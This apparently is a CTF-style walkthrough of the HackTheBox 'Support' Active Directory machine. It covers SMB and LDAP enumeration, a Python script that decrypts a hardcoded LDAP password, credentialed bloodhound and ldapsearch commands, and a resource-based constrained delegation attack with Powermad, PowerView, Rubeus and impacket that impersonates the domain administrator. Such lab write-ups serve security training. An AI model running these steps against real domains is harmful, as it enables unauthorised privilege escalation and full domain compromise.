Where Notes Work
SUPPORT – HACKTHEBOX
This is the Writeup/Walkthrough of the SUPPORT Machine from Hackthebox.
nmap scan:
53/tcp open domain? syn-ack
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2023-08-08 06:33:49Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 19493/tcp): CLEAN (Timeout)
| Check 2 (port 32384/tcp): CLEAN (Couldn't connect)
| Check 3 (port 45724/udp): CLEAN (Timeout)
| Check 4 (port 13515/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_smb2-time: Protocol negotiation failed (SMB2)
ON smb, found 3 shares, on suppported-tools directory, downloaded UserInfo.exe.zip, extracted the all files, and used dnSpy to debug the UserInfo.exe file, after debugging found a password for ldap query with key:
to decrypt the password, I used chatgpt to reverse the code
import base64
enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E"
key = "armando"
def decrypt_password():
decoded_password = base64.b64decode(enc_password)
decrypted_bytes = bytearray(len(decoded_password))
for i in range(len(decoded_password)):
decrypted_bytes[i] = decoded_password[i] ^ ord(key[i % len(key)]) ^ 223
return decrypted_bytes.decode('utf-8')
decrypted_password = decrypt_password()
print("Decrypted Password:", decrypted_password)
i got the password, of user ldap, after that enumerating for the users and domain using bloodhound using the password, that i find, but didn’t find anything interesting except a user “support” can PsRemote into DC.
./bloodhound.py -u ldap -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -d support.htb -ns 10.10.11.174 --zip -c All
after the process, uploaded the zip file into BloodHound, Support user can PSRemote into DC, that’s mean, if i got the user support i can get the DC without any credentials.
after enumerating many things didn’t found anything for support user foothold, after that i tried searching for OU in support.htb using ldapserach, using ldapsearch, found password of support of user
ldapsearch -H ldap://10.10.11.174 -b "dc=support,dc=htb" -D '[email protected]' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' > ldap_search
open with mousepad, and search for Common Name, “CN=support,CN=Users” i already found that in in bloodhound, that there is support user, so i search for this specific users, and found the password.
after getting the password of support user, logged into using evil-winrm, ran again SharpHound.exe and uploaded the data to BloodHound, looking for shortest path to Domain Admin found as above user can PSRemote into DC.SUPPORT.HTB, but i don’t have credentials for administrator, looking forward, looking for user support OUTBOUND OBJECT CONTROL > GROUP DELEGATE OBJECT CONTROL, found that Support user is member of Shared Support Account, and this group has Generic All to DC.SUPPORT.HTB
Abusing Generic All, to abuse this, I uploaded Powermad.ps1, PowerView.ps1 and Rubeus.exe on support user Desktop folder.
Adding new machine to domain
New-MachineAccount -MachineAccount attackersystem -Password $(ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force)
#assinging computer sid
$ComputerSid = Get-DomainComputer attackersystem -Properties objectsid | Select -Expand objectsid
#building generic ACE with attacker-added computer SID
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
#setting Security Descriptor in msDS-AllowedToActOnBehalfOfOtherIdentity field.
Get-DomainComputer dc.support.htb | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
#getting rc4 hash of plain text password
.\Rubeus.exe hash /password:Summer2018!
copy the rc4 hash, then after used Rubeus.exe s4u module to get a service ticket for the service name
.\Rubeus.exe s4u /user:attackersystem$ /rc4:EF266C6B963C0BB683941032008AD47F /impersonateuser:administrator /msdsspn:cifs/dc.support.htb /ptt
after gettting the ticket, copied and save it into file and base64 decoded it and converted using impacket-ticketConverter to ccache file.
after converting the ticket used the ticket to login as administrator using impacket-psexec, psexec.py can be also used.